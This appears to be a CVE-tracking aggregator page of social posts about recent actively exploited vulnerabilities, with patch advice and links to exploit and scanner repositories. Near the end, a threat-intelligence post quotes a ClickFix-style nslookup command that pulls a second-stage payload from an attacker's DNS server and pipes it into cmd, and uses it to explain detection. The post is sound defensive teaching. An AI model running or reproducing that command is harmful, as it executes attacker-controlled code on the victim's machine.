##Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##updated 2026-02-13T21:43:11.137000
1 posts
🚨 New security advisory:
CVE-2025-69770 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2025-69770
updated 2026-02-13T14:23:48.007000
2 posts
Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems
Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.
**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-rce-vulnerability-in-airleader-master-industrial-monitoring-systems-s-8-1-5-f/gD2P6Ple2L
Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems
Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.
**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-rce-vulnerability-in-airleader-master-industrial-monitoring-systems-s-8-1-5-f/gD2P6Ple2L
updated 2026-02-13T14:04:05.243000
2 posts
3 repos
Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen
Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm
#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump
##Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen
Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm
#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump
##updated 2026-02-09T16:08:35.290000
1 posts
🚨 New security advisory:
CVE-2026-22903 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2026-22903
updated 2026-02-09T16:08:35.290000
1 posts
🚨 New security advisory:
CVE-2026-1868 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2026-1868
updated 2026-01-20T16:16:06.200000
2 posts
4 repos
https://github.com/Mefhika120/Ashwesker-CVE-2025-64155
https://github.com/purehate/CVE-2025-64155-hunter
https://github.com/cyberdudebivash/CYBERDUDEBIVASH-FortiSIEM-CVE-2025-64155-Scanner
CVE-2025-64155: 3 Years of Remotely Rooting the Fortinet FortiSIEM https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
##CVE-2025-64155: 3 Years of Remotely Rooting the Fortinet FortiSIEM https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
##updated 2026-01-16T16:23:11.237000
2 posts
CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center https://cymulate.com/blog/cve-2026-20965-azure-windows-admin-center-tenant-wide-rce/
##CVE-2026-20965: Cymulate Research Labs Discovers Token Validation Flaw that Leads to Tenant-Wide RCE in Azure Windows Admin Center https://cymulate.com/blog/cve-2026-20965-azure-windows-admin-center-tenant-wide-rce/
##updated 2026-01-14T21:38:33.547000
2 posts
Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all https://baldur.dk/blog/fortinet-ems-rce.html
##Fortinet Forticlient EMS RCE CVE-2025-59922 and one IMG tag to rule them all https://baldur.dk/blog/fortinet-ems-rce.html
##updated 2025-10-23T01:00:00.913000
2 posts
1 repos
cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.
Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.
When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.
#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft
##cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.
Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.
When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.
#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft
##